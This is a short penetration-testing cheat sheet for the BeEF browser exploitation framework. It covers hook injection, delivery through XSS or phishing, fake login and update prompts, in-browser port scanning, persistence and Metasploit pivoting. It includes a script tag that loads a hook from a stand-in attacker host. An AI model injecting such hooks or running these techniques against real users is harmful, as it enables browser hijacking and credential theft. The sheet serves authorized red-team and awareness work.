BeEF Cheat Sheet
BeEF (Browser Exploitation Framework) is a penetration testing tool focused on client-side attacks. It leverages browser vulnerabilities and behaviors after a victim’s browser is hooked via JavaScript.
Start BeEF
beef-xss
Web UI:
http://127.0.0.1:3000/ui/panel
Default credentials: - Username: beef - Password: beef
Note
Change default credentials immediately.
Hook a Browser
Inject BeEF hook:
<script src="http://ATTACKER_IP:3000/hook.js"></script>
Once loaded, the browser appears as Hooked Browser in BeEF UI.
Hook Delivery Methods
- XSS vulnerability
- Phishing pages
- Malicious iframe
- Rogue Wi-Fi captive portal
BeEF Interface Overview
- Hooked Browsers → Online / Offline
- Commands → Attack modules
- Logs → Event history
Information Gathering Modules
Common modules: - Browser details - Installed plugins - Screen size & OS - Geolocation (if allowed)
Social Engineering Modules
- Fake Flash update
- Fake login prompts
- Alert / confirm dialogs
Danger
Social engineering requires explicit authorization.
Network Attacks (Client-side)
- Port scanning (from browser)
- Internal network discovery
- DNS rebinding (with setup)
Persistence Techniques
- iFrame injection
- Tab nabbing
- Browser polling
Command Execution
Execute JavaScript:
Commands → Misc → Execute JavaScript
Example:
alert('BeEF hooked!');
Integration with Metasploit
BeEF can integrate with Metasploit: - Browser exploitation → pivot to system attacks - Session escalation
Typical Workflow
Inject hook → Browser hooks
Enumerate client
Run info-gathering modules
Execute social engineering or attacks
Common Issues
Browser not hooking
- Mixed content blocked (HTTP vs HTTPS)
- Firewall blocking port 3000
Hook disconnects
- Page refresh
- Browser closed
Related Tools
bettercapmetasploitburpsuitezphisher
Use Cases
- Client-side exploitation
- XSS impact demonstration
- Red team engagements
- Awareness training
Legal Notice
Danger
BeEF must only be used on systems and users you are explicitly authorized to test.